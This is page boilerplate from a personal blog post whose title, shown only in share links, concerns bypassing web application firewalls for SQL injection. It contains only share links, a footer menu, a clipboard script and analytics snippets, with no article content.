  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&name=[WAF绕过]SQL注入篇&description=&lt;p&gt;加密文章，仅自用&lt;/p&gt;" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&t=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    TonyD0g
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-84578611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2e6da3c375c789455b664cea6d4cb29c";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


</body>
</html>
